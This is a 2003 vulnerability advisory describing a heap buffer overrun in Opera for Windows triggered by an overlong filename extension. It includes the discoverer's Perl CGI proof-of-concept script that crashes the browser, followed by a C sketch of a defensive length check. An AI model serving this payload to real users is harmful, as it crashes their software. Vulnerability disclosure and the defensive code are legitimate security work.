Long File Extension Heap Buffer Overrun Vulnerability in Opera for Windows

Reported April 28, 2003, by nesumin.

VERSIONS AFFECTED
Opera for Windows 7.10 (build 2840), 7.03 (build 2670), 7.02 (build 2668), 7.02 bork (build 2656b), 7.01 (build 2651), 6.06b (build 1145), 6.06 (build 1144), 6.05 (build 1140)

DESCRIPTION
Several versions of Opera for Windows contain a Denial of Service (DoS) condition. The condition results from an unchecked buffer on the heap and Opera's failure to check the length of a filename.

DEMONSTRATION
The discoverer posted the following code as proof of concept:
================
This is a Perl script.
---------------------------------------------------------------
#!/usr/bin/perl
# Smash Heap Memory.
# This script is CGI program.
$|=1;
my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100);
print "Content-type: text/html\r\n";
print qq~Content-Disposition: filename="$filename"\r\n~;
print "\r\n";
print "<html><body>Love & Peace :)</body></html>\r\n";
---------------------------------------------------------------

VENDOR RESPONSE
Opera has yet to respond to this problem.

CREDIT
Discovered by nesumin.
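The advisory attributes the crash to an unchecked heap buffer and a missing filename-length check. The following C sketch is an added example, not Opera's code and not from the original report: it shows the length check done before any copy when extracting the extension from a Content-Disposition filename. The names `ext_from_disposition`, `make_long_ext_value` and the limit `MAX_EXT_LEN` are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

#define MAX_EXT_LEN 32  /* assumed policy limit, not a value from the advisory */
enum { EXT_OK = 0, EXT_NONE = 1, EXT_TOO_LONG = 2, EXT_MALFORMED = 3 };

/* Copy the extension of the filename="..." parameter of a Content-Disposition
 * value into out (capacity outsz). Simplified: case-sensitive, quoted form only. */
int ext_from_disposition(const char *value, char *out, size_t outsz)
{
    static const char key[] = "filename=\"";
    const char *start, *end, *dot = NULL, *p;
    size_t len;

    if (outsz == 0) return EXT_MALFORMED;
    out[0] = '\0';
    start = strstr(value, key);
    if (start == NULL) return EXT_NONE;
    start += sizeof(key) - 1;
    end = strchr(start, '"');
    if (end == NULL) return EXT_MALFORMED;      /* unterminated quoted string */
    for (p = start; p < end; p++)               /* last '.' inside the filename */
        if (*p == '.') dot = p;
    if (dot == NULL) return EXT_NONE;

    len = (size_t)(end - dot - 1);              /* bytes after the dot */
    if (len > MAX_EXT_LEN || len >= outsz)
        return EXT_TOO_LONG;                    /* reject before copying anything */
    memcpy(out, dot + 1, len);
    out[len] = '\0';
    return EXT_OK;
}

/* Constructed test input shaped like the header in the PoC above:
 * a filename that is "." followed by n bytes of 0xCC. Caller frees. */
char *make_long_ext_value(size_t n)
{
    static const char pre[] = "filename=\".";
    size_t plen = sizeof(pre) - 1;
    char *v = malloc(plen + n + 2);             /* closing quote + NUL */
    if (v == NULL) return NULL;
    memcpy(v, pre, plen);
    memset(v + plen, 0xCC, n);
    v[plen + n] = '"';
    v[plen + n + 1] = '\0';
    return v;
}
```

An overlong extension is rejected rather than truncated, so the caller can refuse the download name or fall back to a default instead of working with a partial value.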